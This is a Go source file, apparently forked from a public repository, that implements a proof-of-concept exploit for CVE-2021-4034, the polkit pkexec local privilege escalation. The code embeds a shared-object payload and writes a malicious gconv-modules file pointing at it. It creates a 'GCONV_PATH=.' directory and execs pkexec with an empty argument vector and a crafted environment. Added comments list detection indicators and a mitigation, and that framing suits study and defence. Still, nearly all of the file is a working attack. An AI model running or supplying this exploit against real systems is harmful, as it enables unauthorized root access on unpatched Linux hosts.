forked from dzonerzy/poc-cve-2021-4034
exploit.go
package main
import (
_ "embed"
"fmt"
"io/ioutil"
"log"
"os"
"path/filepath"
"strings"
"syscall"
)
// payload holds the bytes of payload.so, compiled into the binary by the
// go:embed directive below. The shared object is not part of this file, so
// what it does when loaded cannot be reviewed from here.
//go:embed payload.so
var payload []byte
const (
// fake_charset is the value main places in the CHARSET environment variable.
fake_charset = "payload"
// gconv_dir names the directory, created in the working directory, that
// receives the generated gconv-modules file. main also passes it as the first
// entry of the environment handed to the target.
gconv_dir = "gconv"
)
var (
// gconv_content is the template for the gconv-modules file. Both lines map the
// PAYLOAD charset name to a module path made of a run of "../" segments followed
// by ${REPLACE}, which wirte_gconv_module replaces with the absolute path of
// payload.so.
// NOTE(review): for defenders, a gconv-modules file outside the system gconv
// directory that points at a module in a user-writable location is a strong
// indicator of a CVE-2021-4034 attempt.
gconv_content = "module PAYLOAD// INTERNAL ../../../../../../../..${REPLACE} 2\nmodule INTERNAL PAYLOAD// ../../../../../../../..${REPLACE} 2"
)
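// wirte_gconv_module stages the files this proof of concept needs, all
// relative to the current working directory:
//
//   - the gconv_dir directory (creation fails if it already exists),
//   - payload.so, a copy of the embedded payload bytes,
//   - gconv_dir/gconv-modules, rendered from gconv_content with ${REPLACE}
//     replaced by the absolute path of payload.so.
//
// Every failure is returned to the caller. Previously the result of writing
// payload.so was discarded and a failed gconv-modules write called log.Fatal
// from inside this function, so the declared error return did not cover all
// failure paths.
//
// Defender note: these three artifacts appearing together in a user-writable
// directory are characteristic of CVE-2021-4034 proof-of-concept runs and are
// worth matching in file-integrity or EDR rules.
func wirte_gconv_module() (err error) {
	if err = os.Mkdir(gconv_dir, 0o0755); err != nil {
		return err
	}

	directory, err := os.Getwd()
	if err != nil {
		return err
	}

	// The same absolute path is used for the file on disk and for the
	// substitution into the module configuration.
	sharedObject := filepath.Join(directory, "payload.so")
	if err = ioutil.WriteFile(sharedObject, payload, 0o0755); err != nil {
		return err
	}

	content := strings.Replace(gconv_content, "${REPLACE}", sharedObject, -1)
	return ioutil.WriteFile(filepath.Join(gconv_dir, "gconv-modules"), []byte(content), 0o0755)
}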
// main stages the on-disk artifacts and then replaces the current process
// with /usr/bin/pkexec, passing a nil argument vector and a four-entry
// environment. Any failing step terminates the program through log.Fatal.
//
// Defender notes for CVE-2021-4034:
//   - Detection: an exec of pkexec with an empty argv, and a directory
//     literally named "GCONV_PATH=." in a user-writable location, are both
//     highly unusual on a healthy host.
//   - Mitigation: install the vendor's patched polkit package; where that is
//     not yet possible, removing the setuid bit from pkexec is the widely
//     published interim workaround.
func main() {
	const pkexecPath = "/usr/bin/pkexec"

	// abortOn keeps the original stop-at-first-error behaviour in one place.
	abortOn := func(err error) {
		if err != nil {
			log.Fatal(err)
		}
	}

	abortOn(wirte_gconv_module())

	// A directory whose name is the string "GCONV_PATH=.", holding a one-byte
	// file named after gconv_dir.
	abortOn(os.Mkdir("GCONV_PATH=.", 0o0755))
	markerPath := fmt.Sprintf("GCONV_PATH=./%s", gconv_dir)
	abortOn(ioutil.WriteFile(markerPath, []byte("\x00"), 0o0755))

	// The environment is passed exactly as listed; the first entry is the bare
	// gconv_dir string rather than a KEY=value pair.
	environment := []string{
		gconv_dir,
		"PATH=GCONV_PATH=.",
		"SHELL=/fake/shell",
		fmt.Sprintf("CHARSET=%s", fake_charset),
	}

	// argv is nil, so the target starts with an empty argument vector. Exec
	// only returns when the call itself failed.
	abortOn(syscall.Exec(pkexecPath, nil, environment))
}